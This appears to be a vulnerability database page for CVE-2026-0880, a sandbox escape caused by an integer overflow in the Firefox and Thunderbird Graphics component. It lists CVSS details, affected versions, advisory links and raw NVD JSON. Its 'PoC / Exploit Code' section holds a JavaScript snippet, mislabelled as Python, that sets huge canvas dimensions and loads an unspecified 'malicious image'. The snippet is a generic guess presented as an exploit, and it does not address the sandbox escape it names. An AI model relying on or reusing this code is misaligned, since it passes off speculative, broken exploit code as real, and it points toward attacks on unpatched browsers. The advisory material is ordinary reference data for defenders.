CVE-2026-0880

Description

Sandbox escape due to integer overflow in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:* - VULNERABLE

Mozilla Firefox < 147

Mozilla Firefox ESR 115.x < 115.32

Mozilla Firefox ESR 140.x < 140.7

Mozilla Thunderbird < 147

Mozilla Thunderbird ESR 140.x < 140.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-0880 PoC - Integer overflow in Graphics component
// This is a conceptual PoC for educational purposes only

function triggerIntegerOverflow() {
    // Attempt to trigger integer overflow in Graphics component
    // by creating a specially crafted canvas/image with extreme dimensions
    
    try {
        const canvas = document.createElement('canvas');
        const ctx = canvas.getContext('2d');
        
        // Attempt to create extremely large image data
        // that might trigger integer overflow in size calculations
        const width = 0x7FFFFFFF;  // Max 32-bit signed integer
        const height = 0x7FFFFFFF;
        
        canvas.width = width;
        canvas.height = height;
        
        // Create image data with overflow-triggering dimensions
        const imageData = ctx.createImageData(width, height);
        
        // Additional manipulation to trigger graphics processing
        const img = new Image();
        img.src = 'malicious_image.png';  // Specially crafted image
        
        img.onload = function() {
            ctx.drawImage(img, 0, 0, width, height);
        };
        
    } catch (e) {
        console.log('Exception caught: ' + e.message);
    }
}

// Trigger the vulnerability
triggerIntegerOverflow();

// Note: Actual exploitation requires specific conditions and browser version
// This PoC demonstrates the concept but may not work on all versions

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0880
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0880
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0880/
[4] VulDB https://vuldb.com/cve/CVE-2026-0880
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=2005014
[6] https://www.mozilla.org/security/advisories/mfsa2026-01/
[7] https://www.mozilla.org/security/advisories/mfsa2026-02/
[8] https://www.mozilla.org/security/advisories/mfsa2026-03/
[9] https://www.mozilla.org/security/advisories/mfsa2026-04/
[10] https://www.mozilla.org/security/advisories/mfsa2026-05/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0880", "sourceIdentifier": "[email protected]", "published": "2026-01-13T14:16:38.557", "lastModified": "2026-04-13T15:17:16.710", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandbox escape due to integer overflow in the Graphics component. This vulnerability was fixed in Firefox 147, Firefox ESR 115.32, Firefox ESR 140.7, Thunderbird 147, and Thunderbird 140.7."}, {"lang": "es", "value": "Escape de sandbox debido a desbordamiento de entero en el componente de Gráficos. Esta vulnerabilidad afecta a Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, y Thunderbird < 140.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.32.0", "matchCriteriaId": "D7C58C67-2B8D-493D-8914-F407E35B348A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "E06AF540-011D-4249-9815-3A4609DD26D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.7.0", "matchCriteriaId": "4FF5535D-A7D8-46C6-AA5A-8EB3762A9171"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.7.0", "matchCriteriaId": "BFBAB968-3244-4970-8D02-CCF9D5FB958D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:-:*:*:*", "versionEndExcluding": "147.0", "matchCriteriaId": "47B67C0A-B05F-4212-9255-0446302237A5"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2005014", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-01/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-02/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-03/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-04/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-05/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}